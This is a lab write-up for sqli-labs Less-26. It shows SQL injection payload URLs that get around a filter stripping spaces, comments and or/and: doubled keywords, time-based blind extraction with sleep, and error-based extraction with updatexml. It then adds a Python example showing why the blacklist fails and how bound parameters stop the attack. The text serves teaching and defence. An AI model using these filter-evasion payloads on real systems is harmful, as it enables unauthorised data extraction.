Look at the source first.
All comment forms and backslashes, as well as the keywords and / or, are filtered out.
Single quotes are not filtered.
Spaces are filtered, too.
http://localhost/sqli-labs-master/Less-26/?id=1'
http://localhost/sqli-labs-master/Less-26/?id=1"
Some of the methods found online use %a0 in place of the space:
http://localhost/sqli-labs-master/Less-26/?id=1'%a0oorr%a0'1'='1
There is a problem, though: the %a0 character does not seem to be recognized. Some people say this is a problem with Apache in a Windows environment.
That can be set aside for now, because the following statement executes normally:
http://localhost/sqli-labs-master/Less-26/?id=1'oorr'1'='1
SELECT * FROM users WHERE id='1'or'1'='1' LIMIT 0,1
With this, an injection like the following can be constructed.
The value of the id parameter contains no comments and no spaces, yet the statement executes normally. When the first character of user() is 'r', the response is delayed by 1s.
http://localhost/sqli-labs-master/Less-26/?id=1'%26%26sleep(ascii(mid(user(),1,1))=114)%26%26'1'='1
SELECT * FROM users WHERE id='1'&&sleep(ascii(mid(user(),1,1))=114)&&'1'='1' LIMIT 0,1
Of course, since error messages are not suppressed, the updatexml function can also be used to display the result directly through an error:
http://localhost/sqli-labs-master/Less-26/?id=1'%26%26updatexml(1,concat(0x7e,user(),0x7e),1)%26%26'1'='1
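Why the filter described at the top does not help, shown as an added example (not the lab's own code): a single-pass blacklist reassembles the doubled keyword, while type validation plus a bound parameter rejects the same input. The filter patterns, the SQLite stand-in database and its rows are assumptions made for illustration, and LIMIT 0,1 is dropped so the changed result is visible.

```python
import re
import sqlite3

# Assumed model of the filter described above: one removal pass per pattern.
BLOCKED = [r"or", r"and", r"/\*", r"--", r"#", r"\s", r"\\"]

def blacklist(value: str) -> str:
    for pattern in BLOCKED:
        value = re.sub(pattern, "", value, flags=re.IGNORECASE)
    return value

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the lab's users table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [(1, "alice"), (2, "bob"), (3, "carol")])
    return db

def lookup_concat(db, raw_id: str):
    """Before: the filtered value is still spliced into the SQL text."""
    sql = "SELECT * FROM users WHERE id='" + blacklist(raw_id) + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, raw_id: str):
    """After: validate the type, then bind the value as data."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []
    return db.execute("SELECT * FROM users WHERE id = ?",
                      (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "1'oorr'1'='1"             # the doubled-keyword input from the page
    print(blacklist(payload))            # keyword is rebuilt by the removal pass
    print(lookup_concat(db, payload))    # every row comes back
    print(lookup_bound(db, payload))     # rejected before reaching the database
    print(lookup_bound(db, "1"))         # legitimate lookup still works
```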
[sqli-labs] Less-26: GET - Error based - All your SPACES and COMMENTS belong to us (GET-type, error-based injection with spaces and comments stripped)